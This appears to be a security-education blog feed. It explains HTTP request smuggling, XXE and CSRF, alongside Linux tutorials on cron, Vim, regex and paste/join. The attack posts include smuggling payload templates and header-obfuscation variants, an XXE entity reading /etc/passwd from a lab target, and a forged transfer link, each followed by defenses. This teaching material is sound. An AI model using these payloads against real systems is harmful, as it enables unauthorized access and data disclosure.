Patch The Net

HTTP Request Smuggling Explained

spectnullbyte — Fri, 31 Dec 2021 15:11:57 +0000

HTTP Request Smuggling (HRS) is a type of attack that is gaining more and more attention in recent years. Its rise is fueled by the high prevalence of Cloud-based applications and services.

In this article, we’ll learn the basics of this attack. We’ll see how it works, how to exploit its various forms, and how to protect against it.

Introduction to HTTP Request Smuggling

Before I go ahead and explain what HTTP Request Smuggling is, we should first start with a brief reminder of how the web works and how web pages are loaded in the web browser.

The Web Page Loading Process

So, here is how the process goes:

A user types in a web browser the HTTP address to a web page.
The web browser sends an HTTP request to a webserver asking for the requested web page.
The webserver replies with an HTTP response containing the requested page.
Finally, the web browser displays the received content to the user.

This process is simple, and it has been the way the web operated for decades.

Well, it was,… for the most part. Actually, this traditional process is becoming less and less common in recent years.

Rather than having direct communication between the client and the webserver, the majority of modern web applications present their content to the user through a chain of HTTP servers.

In addition to the web server that hosts the requested web page, the HTTP communication may also pass through a reverse proxy, a load balancer, a web application firewall, or a caching server. Each of these servers interprets the HTTP header of the requests before forwarding them.

Here is a more realistic representation of how the process works.

A user types in a web browser the HTTP address to a web page.
The web browser sends an HTTP request to the front-end web server asking for the requested web page.
After processing the request, the front-end web server forwards it to the back-end server
The webserver replies with an HTTP response containing the requested page.
Finally, the web browser displays the received content to the user.

In this case, the front-end web server sends many requests to the back-end server. So, how does the back-end server knows where one HTTP request ends and another one begins?

Thankfully, the HTTP protocol specification has defined two ways for marking the end of an HTTP request.

Determining the end of HTTP requests

Content-Length

The Content-Length Header contains the length in bytes of the message body.

GET / HTTP/1.1
HOST: target-website.com
Content-Length: 18

Malicious request

The content length in the above example is 18, which is the number of bytes (characters) contained in the body of the request (17 characters in Malicious request and one character for the new line).

Transfer-Encoding

When the request contains the Transfer-encoding header with a value of chunked, this means that the body of the request contains one or more chunks of data. Each chunk starts with a hexadecimal value that specifies its length and ends with a newline. The webserver understands that it has reached the end of the message body once it encounters a chunk containing the value of zero.

GET / HTTP/1.1
HOST: target-website.com
Transfer-Encoding: chunked

12
Malicious request

0

The above HTTP request contains one chunk marked by the hexadecimal value of 12 (17 when converted to decimal), which is the length in bytes of Malicious request. The request then ends when the webserver reaches a chunk of zero. After this, the webserver will start processing the following request.

By having two ways to handle HTTP requests, a big problem arises: What if the two servers do not use the same technique for delimiting HTTP requests?

In this case, the front-end server may forward a request that contains another, hidden, request to the back-end server. You can see how problematic this could be. Well, this is what we call HTTP Request Smuggling.

A malicious request may reach the backend web server without being processed by the frontend server.

Types of HTTP Request Smuggling Attacks

Now that we have seen how HTTP Request Smuggling attacks work, let’s start exploring the different forms of the attack.

CL.TE

When the front-end server uses Content-Length and the back-end server uses Transfer-Encoding, an attacker can send the following payload to smuggle the malicious request to the back-end server:

GET / HTTP/1.1
HOST: target-website.com
Transfer-Encoding: chunked
Content-Length: 21

0

Malicious request

The front-end will treat the above message as a single request and passes it to the following server. However, when the back-end server receives this request, it will handle it as two different requests separated by the line that contains 0.

TE.CL

When the front-end server uses Transfer-Encoding and the back-end server uses Content-Length, this time, an attacker can send the following payload to smuggle the malicious request to the back-end server:

GET / HTTP/1.1
HOST: target-website.com
Transfer-Encoding: chunked
Content-Length: 4

12
Malicious request

0

In this situation, the front-end server processes the request based on the Transfer-Encoding Header. And so, it will forward the entire request to the back-end server.

When the back-end server receives the request, it sees that the content-length is 4 bytes, and so it will stop processing the request at the beginning of the line containing Malicious request. The web server will then consider what comes next as a new request.

TE.TE

When both servers use Transfer-Encoding, they can differ in the way they interpret the header.

For instance, the following requests can be handled differently depending on the presence of space and tab characters:

Transfer-Encoding: chunked
Transfer-Encoding : chunked
 Transfer-Encoding: chunked
Transfer-Encoding[Tab]:chunked

The options are endless here, but you can see now how the vulnerability can still be present even if the two servers agree on the Transfer-Encoding as a way to separate requests.

Preventing HTTP Request Smuggling Attacks

You can prevent HTTP request smuggling by following certain good practices.

Use HTTP/2 protocol for communications between front-end and back-end servers.
The Back-end server should reject all ambiguous requests.
When possible, use the same web server solution for both the front-end and back-end servers (Apache, Nginx, IIS…). Of course, this won’t always be possible as front-end servers are often hardware appliances that do not offer options for customization.
Use a Web Application Firewall (WAF) that provides a protection against HTTP Request Smuggling attacks.

The post HTTP Request Smuggling Explained appeared first on Patch The Net.

XXE Attacks Explained

spectnullbyte — Sun, 12 Dec 2021 15:12:09 +0000

Out of the many attacks that threaten web applications today, XXE remains the one that is talked about the least. Although it gets far less attention than XSS or SQL injections, it does carry its own risk and should not be taken as a slight.

In this guide, I will try to explain what XXE is, why it is dangerous, and how to protect against it. But, before we can learn about this attack, we would first need to understand a few things about XML.

Introduction to XML

XML (eXtensible Markup Language) is a tag-based language that applications use for transferring data. Contrary to other tag-based languages (like HTML), XML does not have pre-defined tags. Instead, these are defined by the user.

Here is an example of an XML code:


John
Peter
Hi
Hi Peter, How are you doing?

In the above code, the email tag contains 4 child tags: sender, recipient, subject, and message. Each of these tags encloses a string of characters, referred to in XML as parsed character data (or PCDATA).

XML File Declaration

An XML file should start with an XML declaration. This should include at least the version of XML that the file uses. It can also include the encoding and standalone as options. These two are optional, but the version attribute is mandatory.

Here is how an XML file declaration should look like:

As you can see, there are three different attributes:

version : This can either be 1.0 or 1.1. If you do not write an XML declaration, then the version defaults to XML 1.0.
encoding : In most cases, you will be using UTF-8. However, depending on the characters used, you can specify UTF-16 for this attribute.
standalone : This attribute can have either yes or no values. It indicates whether the XML file depends on any other files to work properly or not.

Document Type Definition (DTD)

DTD (Document Type Definition) defines the structure of an XML document so that different people can agree on the same elements and attributes to use.

There are two different types of DTDs:

Internal DTD

When an XML document includes the definition of its own structure, that definition is what we refer to as an internal DTD. It is contained in the tag that is written at the beginning of the file, just after the XML declaration.

Here is an example of an internal DTD:

]>

With !DOCTYPE email, we define email as the root element of the XML document.

The second line specifies that the email element should contain four child elements: sender, recipient, subject, and message.

After that, we specify that each of these child elements should contain parsed character data (PCDATA).

You have probably noticed that this DTD defines the same structure that we’ve seen in the previous XML code example.

External DTD

Now for this second type, we define the XML structure in an external file. In this case, the tag should contain the URL to the DTD file using the SYSTEM keyword.

We need to add the following line to the beginning of our XML document, just after the XML declaration line.

And here is what the external DTD file “email.dtd” contains:

Here again, DTD defines the same structure as in the examples we’ve seen before.

XML Entity

An XML entity is a string of characters that the XML parser replaces with another value when encountered in the document. This is similar to what variables are in programming languages.

An entity is written in the form: Ampersand (&) + name of entity + semi-colon (;).

In addition to user-defined entities, there are many built-in entities. Such examples are < and >, which get replaced with the lower than (<) and greater than (>) characters respectively.

Similar to DTDs, there are two types of entities: Internal and external.

Internal Entities

An internal entity is defined in the following form :

Whenever there is a &name; in the file, the XML parser replaces it with value.

External Entities

On the other hand, instead of providing a value, an external entity refers to a URL using the SYSTEM keyword.

Similar to an internal entity, whenever a parser encounters a &name; in the XML file, it replaces it with the content of the URL that the external entity declaration refers to.

Introduction to XXE

XXE (XML eXternal Entity) is a type of attack that takes advantage of external entities in XML files.

Some websites rely on XML for transferring data between the browser and the webserver. When it receives data in XML, the webserver transmits it to an XML parser which processes this data.

XXE Attack Process

As we’ve seen in the previous section, XXE, or XML eXternal Entities, are not a vulnerability on their own. Like any other XML feature, they are just an inherent part of the language. Therefore, an XML parser will, by default, interpret them, and, as expected from it, it will load the external content that they call. This, of course, can be prevented with some secure configuration practices, which we will cover later in this article.

Now a malicious user can take advantage of this XML feature to define external entities that retrieve sensitive files from the server-side, leading to exploiting a vulnerable XML parser.

Let’s see how this works with a simple example.

XXE Attack Example

To demonstrate the impact of an XXE attack, we are going to use an example taken from the Mustacchio room on TryHackMe.

As shown in the image below, we have at our disposal a form input to add a comment on the website.

With the proxy interception enabled on Burp Suite, I have typed Hello and submitted the form.

On Burp Suite, I have intercepted the following request.

We can see that the web application stores the “Hello” value in a variable named xml. This hints at the possibility that it can accept XML code as an input.

After doing some enumeration, I have managed to get the correct XML structure for adding a comment, which is as follows:


Name
Author
Comment

So, with that in mind, let’s change the xml parameter value with the following code :



]>

&malicious
Barry
The comment

The payload shouldn’t be difficult to understand. We have defined malicious as an external entity, to which we associate the content of the file file:///etc/passwd as its value.

When the XML parser arrives at &malicious;, it will load at its place the content of /etc/passwd, thus revealing sensitive information from the webserver, as the following image shows.

How to Prevent XXE Attacks

Fortunately, XXE attacks aren’t always effective. Their success requires misconfigurations to be on the target website. So, by making sure that our websites don’t have these poor configuration settings, we can mitigate the risk of XXE attacks.

Here are some of the good practices that we can implement to achieve this.

Disabling DTDs and External Entities on the XML parser.
Always validate and sanitize all user-provided inputs before their processing.
Continually patch and update XML parsers.
Scan the web application using SAST and DAST tools.

Conclusion

So, we have reached the end of this article. We’ve started by learning about XML, entities, and DTDs. We’ve then learned about XXE attacks, and how they are performed. Then, we’ve seen an example of an XXE attack using the TryHackMe room. We’ve also listed some of the good practices to follow to prevent these attacks from happening.

With all that, we’ve barely scratched the surface of XXE attacks and their impact. There are many other variants of this attack, from denial of service to sensitive information disclosure. There is still a lot to learn. I invite you to keep reading about this. To help you in that, the OWASP can be a good next step where you can learn more about the topic.

The post XXE Attacks Explained appeared first on Patch The Net.

Chapter 11 – Schedule Tasks

spectnullbyte — Sat, 04 Dec 2021 10:57:06 +0000

We have learned a lot since we started this tutorial. We are starting to gain more confidence in operating a Linux system.

However, so far, we have been limited to running manual commands. In other words, we have to manually type in commands and press enter in order to execute a task. Having to rely solely on this manual task execution can limit our ability to administer a Linux system. Often, we would need to schedule certain tasks (or jobs, as we call them) automatically at a predetermined time or interval without having to run them manually.

This chapter will introduce you to two Linux command-line utilities that will allow you to do just that.

Schedule Tasks to Run Once

The first command we are going to cover in this chapter is at.

This is a Linux command-line utility that allows you to schedule certain tasks to run only once at a certain time and date.

Installing the command

To start using at, you should first run it with no arguments to confirm that it is already installed in your Linux.

If it is not the case, then you can simply install it using your distribution’s packet manager. For instance, if you’re running Linux Mint, Ubuntu, or any Debian-based distro, then simply run the following command:

sudo apt-get install at

Schedule a Task

The syntax for running at is as follow:

at [OPTIONS] runtime

If you want to schedule a job to run at a certain time, then you can specify the time as an argument to at as the above syntax shows.

You can specify time in the form of HH:MM or using the am/pm suffixes. You can also specify the date in the form of MMDDYY.

Then, once you press Enter and the command is run, you should find yourself on a command prompt that starts with at>. You can then start typing the commands that will be part of the job that you want to schedule. When you’re done typing all the commands, just press Ctrl-D and that should bring you back to your normal command prompt.

You can use at with -l option to list all your current jobs, and you can also remove a job using the -r option followed by the number of the job to remove.

Schedule Tasks to Run Periodically

Cron is a Linux utility that will allow you to run tasks on a predetermined schedule, instead of always having to run every task manually in real-time.

Backup Case

Let’s say that you want to backup your website every day at 3 am. One way to do this is to wake up every night at 3 and manually run the backup command, which might be something like this :

$ cp /website/ /websitebackup/

Well, you can see how cumbersome that can be. Thankfully, this is where the Cron Jobs come in. They allow you to run a task on a schedule. For our case, all we have to do is to create a Cron job that will run the above command every day at 3 am.

Cron Table

Now that we know that the cron utility is what allows us to schedule tasks, let’s try and create a Cron Job.

You can view and add Cron jobs in configuration files called crontabs (short for Cron Tables). There is one particular crontab that is general and that you can use to schedule system-wide jobs. This special file is located at /etc/crontab and follows a standard structure.

Every line in this file defines a job. Here is the structure of a job definition :

As the image above shows, there are seven total columns. The first five represents the date and time when to run the job. The fifth column is the user that the task will be run as. Finally, the last column represents the command that will run in this job.

Time and Date

In order to define the time and date, here is something to keep in mind.

When the asterisk symbol (*) is given for a column, then that column will match all its possible values. For example, if we keep an asterisk (*) in the hour field, this means that every hour is a match.

If, however, we give the hours column the value of 7, then it will only match 7 am.

Back to our Case

Before we move on, let’s go back to our example.

Here is the job definition that will run our backup command every day at 3 am.

* 3 * * * user cp /website/ /websitebackup/

You should now be able to understand the above line on your own. If you are having difficulties, you can re-read this chapter before you can move on.

It is important to fully understand all that we have covered so far in this tutorial. In the next chapters, we will be discussing bash scripting, which is different from what we have covered so far, and a bit more challenging. So, if you feel that there is a chapter that you didn’t fully grasp, I invite you to go back and re-read it. This way, we can all be on the same page when we embark on the next phase

The post Chapter 11 – Schedule Tasks appeared first on Patch The Net.

CSRF (Cross-Site Request Forgery) Explained

spectnullbyte — Sun, 28 Nov 2021 11:05:08 +0000

Cross-Site Request Forgery (CSRF or XSRF), also called Client-Side Request Forgery, is a type of attack that targets web applications. It allows an attacker to induce users into accessing and changing a state on a website inadvertently.

In this article, we are going to explain how CSRF attacks work; why do they pose a threat to web applications; and what are some of the security safeguards that we can implement to protect our websites against them.

How does a CSRF attack work?

A CSRF attack targets users that are authenticated to a vulnerable website. Through this attack, an attacker can take the identity of a user and perform an action on their behalf. These actions will then appear to the website as if they were performed by the legitimate user.

To better understand how the process works, let’s consider the following scenario.

CSRF Process

Let’s say that a legitimate user is authenticated to their bank’s website. Now, let’s assume that this website is vulnerable to CSRF. A user can send money to other users from their account by accessing the following link:

www.bank.com/transfer.php?to=recipient&amount=1000

An attacker can forge a link that would make the logged-in user send him money, This link will look something like this:

www.bank.com/transfer.php?to=attacker&amount=1000

The attacker can then induce the legitimate user to access this link by sending it through a phishing email, or through another malicious website that the attacker controls.

Once the user clicks on the link, then an amount of 1000$ will get transferred to the attacker from the victim’s account.

This is just one example of the many CSRF attack scenarios. Other examples include password resets, items added to a shopping cart, and stolen sensitive information. All that without the user’s knowledge.

GET vs POST

In this example, the website allows state changing operations using the GET method. Such websites are a golden mine for a malicious actor. Since the GET method contains the parameters in the link, the attacker will only have to send a forged link to a legitimate user as we did here.

For this reason, using the POST method for state-changing operations is preferrable. It does not include parameters in its link, and requires using a form to send these parameters.

Although the POST method is not entirely immune to CSRF, it just adds another step for the attacker and complicates the delivery process. Instead of delivering a simple link, the attacker will have to create an HTML page with a form that sends the malicious request to the victim’s website.

Web developers should not rely solely on the POST method as the solution to the problem, we will discuss more effective controls against CSRF later in this article.

Causes

As the above process shows, what makes this attack vector possible is the trust that the website has in the browser.

When a user logs in, the website starts a session and provides the associated cookie to the user’s browser. From then on, the browser will include this cookie in all future requests. The website then trusts all requests originating from that browser.

Now, when a user with an active session receives a forged link from an attacker, and they click on it, the browser will include the user’s cookie with the request and the website will see that the request originates from a legitimate user with an active session.

Impact

The impact of CSRF can be devastating for any organization having a website that is vulnerable to this attack. They might have their reputation tarnished, users may become mistrustful of them, and they may even run the risk of incurring regulatory fines.

In addition to attacks targeting end users, an attacker can use CSRF against users with privileged account, such as admins. When successful, this might give the attacker control over the entire web application.

All these are reasons enough to implement good practices to protect against CSRF attacks.

How to protect against CSRF?

Thankfully, your website doesn’t have to be vulnerable to this attack. There are some good practices that you can implement if you want to protect your website against CSRF.

Some of these good practices include:

A website should not permit state-changing operations based on GET requests.
Always limit session duration for connected users. Websites should terminate sessions whenever users leave the website.
Cross-Site Scripting (XSS) prevention controls should also be implemented, since XSS can be used to exploit CSRF.

More importantly, there are two main controls that can help in preventing CSRF attacks against a website, and these are CSRF tokens and SameSite cookie.

CSRF Tokens

Use anti-CSRF tokens with every request that changes a state in the website. The web application should generate these tokens on the server-side and their value should be unpredictable. If a malicious user attempts a CSRF attack, they will never be able to change a state on the website since their request would need to include the associated token, which they do not know.

SameSite Cookie

The SameSite cookie attribute will prevent cookies from being sent in cross-site requests. A website should specify within its response header “Set-Cookie” the value of SameSite to Lax or Strict. This will prevent the browser from sending the session cookie to the website with requests originating from other websites.

This article was just a brief introduction to Cross-Site Request Forgery (CSRF). It should be your first step in the topic. If you wish to learn more, you can check OWASP’s page about this attack.

The post CSRF (Cross-Site Request Forgery) Explained appeared first on Patch The Net.

Chapter 10 – Vim

spectnullbyte — Thu, 25 Nov 2021 17:29:00 +0000

After having spent time learning the most important commands that we need to perform essential tasks on Linux, you should realize by now that using the command line interface on its own has its limitations.

We cannot write scripts, change configurations, automate tasks, and more, from a prompt. For this, we have to venture outside the CLI, and onto a text editor, and more precisely, onto Vim.

Vim isn’t your typical Notepad, so don’t take this chapter as a slight.

First Steps With Vim

Vim is available in almost all Linux distributions. So, you don’t have to install it on your machine.

However, in some cases, especially when you have a lightweight distro, Vim may not be readily available to you by default. In that case, you can still install it using your distribution’s package manager.

For instance, if you are running a Debian-based distribution, then you can simply run: apt-get install vim and that should do it.

Starting vim

To open Vim, simply type the vim command, followed by the file that you want to edit.

$ vim myfile.txt

If the provided filename does not exist, vim will create an empty file with that name.

This is what you should see when you run the above command:

Quitting Vim

Now, before we start typing and editing text, the first and most important thing you need to know about Vim is how to exit from it.

And no, we are not going to close it using the X button at the top right of the window. This isn’t the right way to do it. Besides, this option is only possible in graphical desktop environments. And in many cases, you might find yourself using Vim in a non-graphical terminal, in which there are no windows, and therefore no X buttons.

So, to gracefully exit from Vim in the correct way, you should press the colon key, followed by q (as in quit) :q. You should view the keys that you’re typing at the bottom of your screen as shown below.

After that, simply press enter, and you should be out of Vim and back to your command line prompt.

By typing the above command, the changes you made to the file will not be saved. If you wish to save and exit, then instead of :q, you should type :wq, which is a combination of :w (as in write), and :q.

Vim modes

Note that when you typed :q in the previous example, it did not get inserted in the content of the file as you would expect from a text editor.

This is because you can only type directly in the content of a file in Vim when you are in the insert mode. But Vim opens by default in the normal mode.

So, when Vim is in the normal mode, you can not type directly into the file, but you can do a lot of other things, like navigating within its content using certain key presses.

To move from the normal mode to the insert mode, you can do that by pressing the i key. And, whenever you want to go back to the normal mode (not just from the insert mode, but from any other mode), then simply press the escape key esc.

Now, when you are in the normal mode, and you press the colon key :, you switch to the command mode. This is what we did before in our previous example. When we pressed :q (or :wq), what we did was, switching first to the command mode by pressing the colon, and then, we ran the command q to exit from Vim.

To summarize this section, we have learned about three modes in Vim: The Normal, Insert, and Command Modes. There are other modes of course, but for now, let’s focus on these, and we’ll get the chance to cover the others later in this chapter.

Insert Mode

As mentioned earlier, you can access the insert mode by pressing the i key. Once you’re there, you can edit your text directly as you would do with a normal text editor.

Insert Mode

You can go back anytime to the normal mode by pressing the escape key Esc.

Normal Mode

Move the Cursor

Now, say we have a file with a lot of text. In a graphical environment, we can easily navigate within this file using the mouse. However, this option is not a possibility with Vim. So, how do we go about navigating and moving the cursor in this case?

Thankfully, the normal mode allows us to navigate easily by pressing certain keys:

j : Move the cursor down one line.
h : Move the cursor left one character.
k : Move the cursor up one line.
l : Move the cursor right one character.
w : Move the cursor to the next word.
b : Move the cursor to the previous word.
0 : Move the cursor to the beginning of the current line.
$ : Move the cursor to the end of the current line.

For most of these keys, you can press a numeric key before them to have them applied several times. For instance :

5j : Move the cursor down 5 lines.
4h : Move the cursor left 4 characters.
3w : Move the cursor to the next third word.
3b : Move the cursor to the previous third word.

Undo/Redo

You can undo a previous change by pressing the u key. To do the opposite, and redo what you’ve undone, then you can simply press ctrl+r.

Changing text in normal mode

Although the insert mode is where you can edit the text of a file by typing directly into it, you can still apply some changes to the text while being in the normal mode.

You can use x to delete the character at the current position of the cursor, or you can replace it by pressing r followed by the character you wish to replace it with.

You can use the delete command d, followed by another character to delete a single word, line, or more:

dd : Delete the current line.
5dd : Delete the next 5 lines.
dw : Delete the current word.
4dw : Delete the next 4 words.
d$ : Delete all text from the current position of the cursor to the end of line.
d0 : Delete all text from the beginning of line to the current position of the cursor.

Note that the text that you remove using the delete command gets stored in Vim’s clipboard. In other words, this is similar to cut. So, when you delete text using one of the above commands, you can paste it after by pressing p.

Speaking of copy and paste, you sure would want to know how to copy text in Vim without removing it. For this, you would have to first select the portion of text that you want to copy, and then press y.

Well, that would be simple if only we had a mouse to select text with. In our case, we have something else: The Visual Mode.

Visual Mode

If you want to select text in order to copy it or delete it, then you can do so by pressing v first, this should put you in the visual mode, and then you can change your selection by pressing the same keys used for navigation in the normal mode.

Once you are satisfied with your selection, you can then either delete it by pressing d, or just copy it using y.

Visual Mode

Replace Mode

The replace mode allows you to replace text by typing directly over it. You can access the replace mode by pressing the R key. Once again, when you’re done replacing the text that you want, you can go back to the normal mode by pressing the escape key.

If you’ve reached this far, then you should now have the basic knowledge to start using Vim. Now, your next step should be to practice.

You should keep in mind that only after you have spent hours on this text editor that you can truly grasp its utility. At first, you might find yourself editing text at a slower pace than what you’re used to. But, once you get over the learning curve, you will be surprised at how fast you can edit text.

The post Chapter 10 – Vim appeared first on Patch The Net.

A Quick Guide To Regular Expressions

spectnullbyte — Sun, 26 Sep 2021 10:54:32 +0000

Regular expressions are present in almost all programming languages (Python, PHP, Javascript…), as well as in Linux commands (grep, sed…) and in many other high-level languages and applications.

So, why are they so widely present? what exactly are they used for? and how can we start using them ourselves?

Before we go ahead and address these questions, I am going to start first by addressing the elephant in the room and answer the first question that should be pondering in your mind.

What are Regular Expressions?

A regular expression (or Regex) is a string of characters that specifies a search pattern. It is often used to match text while performing “find” and/or “replace” operations.

I know this definition might be confusing, which makes regular expressions quite difficult to understand at first. But don’t worry, you’ll soon grasp their utility as we progress through this article, in which we are going to learn how to read and write regexes, starting from simple and short examples to more advanced patterns.

Why use Regular Expresions?

You might have used wildcards before in your search queries. For instance, when searching for *.html, you can retrieve all files that end with .html.

Well, regular expressions work in a similar way, except that they are more powerful and allow for more advanced text filtering options.

When it comes to learning new concepts, examples are a lot more effective than mere definitions. So, here you go. These couple of examples should help you better understand why we use regular expressions.

Example 1 : To validate email addresses

\b[a-zA-Z0-9_.+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}\b

Example 2 : To validate phone numbers

^\+?([0-9]{1,3})?\s?\(?[0-9]{3}\)?[-\s.]?[0-9]{3}[-\s.]?[0-9]{4,6}$

Example 3 : To validate IP addresses

\b[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\b

I can already see the confusion in your eyes. But hey, rest assured, this isn’t Chinese. In fact, I dare you that by the end of this article, you will be able to read and understand what these expressions mean.

As you can see, by using the above examples, we can check if a certain string is an email address, a phone number, or an IP address. And these are not the only things that you can validate. Once you learn how to write regular expressions, you will be able to check for literally any type of string.

If you want to verify on your own the above examples, or the regex patterns that we will see in the rest of this article (Which I encourage you to do), then you can do that on Regex101. This is a useful website that offers an interactive regex debugger, where you can test your own regex patterns against an input string.

How to Write Regular Expressions?

Now that you have witnessed with your own eyes what Regular Expressions are capable of, it is time for you to start learning the art of Regex-Fu.

So, without any more delay, your training begins now.

Literal Characters

The most basic regular expression you can write is simply using the literal text string that you wish to find.

For instance, using discovery as the regex pattern against the string : I made a discovery today will match the colored occurrence of the word discovery.

The word discovery occurs one time only in this example. If there had been more than one occurrence of that word, then, depending on the options that you’re using regex with, it may only match the first occurrence of the literal string.

The way you define these options (Sometimes also called flags) varies depending on the application or programming language you’re using, as not all implementations of Regex are equal. If you’re only using Regex101 to test your patterns, then you can click on the ‘mg’ characters as shown in the image below to set your Regex options.

The most important flags that you may want to set are global (To return all occurrences instead of only the first one) and insensitive (To perform case insensitive matches. That is, without differentiating between uppercase and lowercase letters).

Enough with flags now, let’s go back to our regex patterns.

Character Classes

A character class is used to match one of many given characters. To specify one, you should enclose the characters into square brackets [].

For instance, using the expression [gst]old will match with the words gold, sold, as well as told. However, it won’t match with gstold.

You can also use a hyphen in a character class to specify a range. For instance, [a-z] will match all characters between a and z (That is, all lowercase letters). You can also match only digit numbers by using [0-9].

To make things even more interesting, you can combine all these ranges in a single character class : [a-zA-Z0-9._-]. This class will match with all lowercase and uppercase letters, digit numbers, as well as the dot ., underscore _, and hyphen - characters.

If you find it tiring to have to type all these ranges, then you can use shorthand classes for the ones that people use often. You can use \d instead of [0-9] to match a digit number, or \w instead of [a-zA-Z0-9_] to match a word character (all letters, digits, plus the underscore character).

Now, as much as these classes are powerful and flexible in matching all sorts of characters, they are still limited in that they only match one character at a time. On their own, classes won’t be able to match an entire word. This is where quantifiers come into play.

Quantifiers

A quantifier specifies how many consecutive occurrences of a specific character, or a class has to be present in a string before it can match it.

There are three main special characters that you can use as quantifiers, and these are :

The star character * provides a match if zero or more consecutive occurrences of the previous element are present.
The plus sign + matches if one or more consecutive occurences of the previous element are present.
And the question mark ? matches if zero or one occurrence of the previous element is present.

Here are some examples to make things clearer:

No+ will match with ‘No’, ‘Noo’, ‘Nooo’, ‘Noooo’… (You can see where I’m going, I don’t need to continue forever).
computers? will match with ‘computer’ and ‘computers’ (Zero or one occurrence of the character ‘s’).
0*[0-9]? will match with any number between 0 and 9, whether it is written as a single digit (0,1,…,9), or starting with one or more zeros (ex. 01, 0005, 003).

You can also specify the exact number of times that you want the previous element to match by using curly braces {}.

As always, a couple of examples will demonstrate the three main ways you can use curly braces as quantifiers :

[0-9]{5} will match any number with 5 digits.
a{1,3}nd will match with and, aand, as well as aaand (That is, with any number of occurrences between 1 and 3).
And [a-zA-Z0-9]{8,} will match with any string of 8 or more characters (This can be used to validate passwords when requiring users to choose passwords with at least 8 characters of length).

Groups

You can use parentheses around a set of characters to create a group. If you add a quantifier after it, then it would apply to the entire group, not just the last character, or class.

As an example, (ha){2,} will match with haha, hahaha,… (Any time there is a laugh).

You can also use a group with an alternation. This is the equivalent of the or operator.

For example, I love (coffee|tea) will match with both I love coffee, and I love tea.

You can also use parenthesis to create a capturing group. Every time you use parenthesis in your expression, a capturing group is created. You can think of it as a variable that will hold the text string that is matching between parenthesis.

To go back to our previous example : I love (coffee|tea), we have one set of parenthesis, which means we only have one group (group 1). If we run this regex pattern against the string : I love tea, then group 1 will contain the string tea.

Retrieving the value contained in capturing groups depends on the programming language or application that you’re using regex with. However, if you are only testing with Regex101, then you can still see their content in the “Match information block” on the right side as shown in the screen below:

This example has only one capturing group, but you can have as many as you want.

The Dot

The Dot . in regex has a special meaning. It matches all characters (Except for a line break).

The regex pattern c.ffee will match with coffee, caffee, c8ffee, c-ffee…

It is used often in combination with quantifiers (+, *,…).

The regex pattern .* will match any string that is given as its input. On its own, it doesn’t serve for anything. However, when combined with other regex elements, it can be used to fill in any part of a pattern where we don’t know what the string that would match it will contain.

For example, the regex pattern c.*s, will literally match anything that is delimited by c and s.

Anchors

Anchors allow you to match depending on the position in the string.

The most used anchors are : ^ to match the beginning of the string (or a line, if the input string is multi-line), and $ for the end of the string (or line).

The regex pattern ^C will match any string (or line) that starts with the letter C. It would match with the string : Computer Stuffs, but not with Doing Computer Stuffs. This is because the latter starts with the character D, and not C.

Similarly, s$ will match any string (or line) that ends with the letter s. It would match the input string : Computers, but not Computer.

Another useful anchor is : \b, which is used to specify a word boundary. So, if you use the regex pattern \bcomputer\b, then this would match the string : I own a computer, but not I own computers. This is because, in the latter, there is an s character after the string computer, and not a word boundary.

Escaping metacharacters

As we’ve seen in the previous sections, many characters have special meanings when used in a regex string. These are : .+?*[](){}....

Now, what if we want to match literally one of these characters in a string input?

For instance, what if we want to match a phone number starting with the character +. If we use the regex string +[0-9]{15}, then this would generate an error. This is because we are using the + sign without a preceding element to which the quantifier would apply.

To bypass this, and force the interpretation of these metacharacters as literal characters, we can use \ before them. So, in our example, the proper string to use would be \+[0-9]{15}.

Note that the above regex pattern is oversimplified. It won’t be able to match phone numbers that contain hyphens within them. For the sake of this example, it was simplified to only match with phone numbers starting with +, followed by 15 digit numbers. If you want a more accurate regex for phone number validation, you can take a look at the one provided as an example earlier in this article.

Conclusion

We have reached the end of this article, you should now be able to write your own regex patterns that suit your needs. I invite you to go back to the examples provided at the beginning of this article to try and understand why they work

If you want to challenge yourself even further, you can also try to write regular expressions for validating dates, credit card numbers, and checking password complexity. These should keep you busy for a while.

The post A Quick Guide To Regular Expressions appeared first on Patch The Net.

Chapter 9 – Advanced Data Processing

spectnullbyte — Mon, 06 Sep 2021 20:33:09 +0000

Processing data on Linux is really simple. Many commands are available for all kinds of text-processing functions. We’ve seen some of these commands in the previous chapter, but their number and wide range are much larger for them to be compressed in a single chapter.

Considering this, I deemed it would be necessary to dedicate another chapter to explore the rest of the commands that we haven’t yet had the chance to cover.

Joining Files

Using Paste

“paste” is one of the most useful commands on Linux. Depending on the provided arguments, there are two ways you can use it:

To join files horizontally.
To join lines in a single file.

Let’s start with the first usage method.

Joining Files Horizontally

When you provide paste with two files or more as its arguments, it will join the lines of these files and send them to its standard output. Fields from these files will be separated by a tab.

To illustrate this with an example, let us consider the following three files: names.txt, age.txt, and city.txt.

names.txt :

James
Mary
Patricia
Robert
John

age.txt :

city.txt :

London
New York
Liverpool
Sydney
Glasgow

If we run “paste” against these three files without any other additional parameter, we should get an output that combines each line of these three files. Here is the result:

$ paste names.txt age.txt city.txt 
James   34      London
Mary    21      New York
Patricia        54      Liverpool
Robert  49      Sydney
John    18      Glasgow

By default, the command separates the fields from each file with a tab. If you want, you can use another delimiter by specifying it after the “-d” flag.

$ paste -d ":" names.txt age.txt city.txt
James:34:London
Mary:21:New York
Patricia:54:Liverpool
Robert:49:Sydney
John:18:Glasgow

Joining Lines in a Single File

When you provide “paste” with only one single file and use the “-s” flag, then it will combine all the lines of that file in a single line.

Here is an example to make things clear.

$ paste -s names.txt
James Mary Patricia Robert John

You can use another delimiter other than the default one. To do so, just type in “-d” followed by the delimiter just like we did before.

$ paste -s -d "," names.txt
James,Mary,Patricia,Robert,John

Using Join

The “join” command allows you to join files based on a common field.

Let us consider the following two files :

name-with-city.txt

James London
Mary New York
Patricia Liverpool
Robert Sydney
John Glasgow

name-with-age.txt

James 34
Mary 21
Patricia 54
Robert 49
John 18

We can use “join” to combine these two files. It will combine lines from both files that start with the same first field.

$ join name-with-city.txt name-with-age.txt
James London 34
Mary New York 21
Patricia Liverpool 54
Robert Sydney 49
John Glasgow 18

Text Transformation

Replacing Characters

The “tr” command is easy to use and very practical when you need to replace certain characters with others.

For example, the command below will convert everything we type into uppercase.

$ tr a-z A-Z
Typing random words!
TYPING RANDOM WORDS!

In this example, we have applied the “tr” command to the standard input. So everything we type on the terminal will get uppercased. But what if we want to uppercase the content of an existing file?

Well, that’s also possible.

To do that, we can read the file using “cat” and then pass the output to “tr” using a pipe, just as the next example will demonstrate.

